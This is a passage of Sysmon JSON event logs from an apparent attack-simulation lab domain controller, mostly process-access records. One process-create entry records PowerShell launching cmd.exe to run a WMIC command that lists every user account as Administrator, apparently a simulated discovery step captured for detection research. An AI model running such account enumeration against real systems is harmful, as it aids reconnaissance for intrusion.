C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5212,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5213,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5214,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5215,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-00108C3E0800}","TargetProcessId":"668","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5216,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-00108C3E0800}","TargetProcessId":"668","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5217,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.847\r\nProcessGuid: {41C8662E-20D1-5F25-0000-0010583F0800}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\wbem\\WMIC.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: wmic  useraccount get /ALL /format:csv \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E\r\nParentProcessGuid: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nParentProcessId: 668\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic useraccount get /ALL /format:csv\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.847","ProcessGuid":"{41C8662E-20D1-5F25-0000-0010583F0800}","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"WMI Commandline Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"wmic.exe","CommandLine":"wmic  useraccount get /ALL /format:csv ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E","ParentProcessGuid":"{41C8662E-20D1-5F25-0000-00108C3E0800}","ParentProcessId":"668","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic useraccount get /ALL /format:csv\" ","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5218,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nSourceProcessId: 668\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010583F0800}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-00108C3E0800}","SourceProcessId":"668","SourceThreadId":"3780","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010583F0800}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5219,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010583F0800}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010583F0800}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5220,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 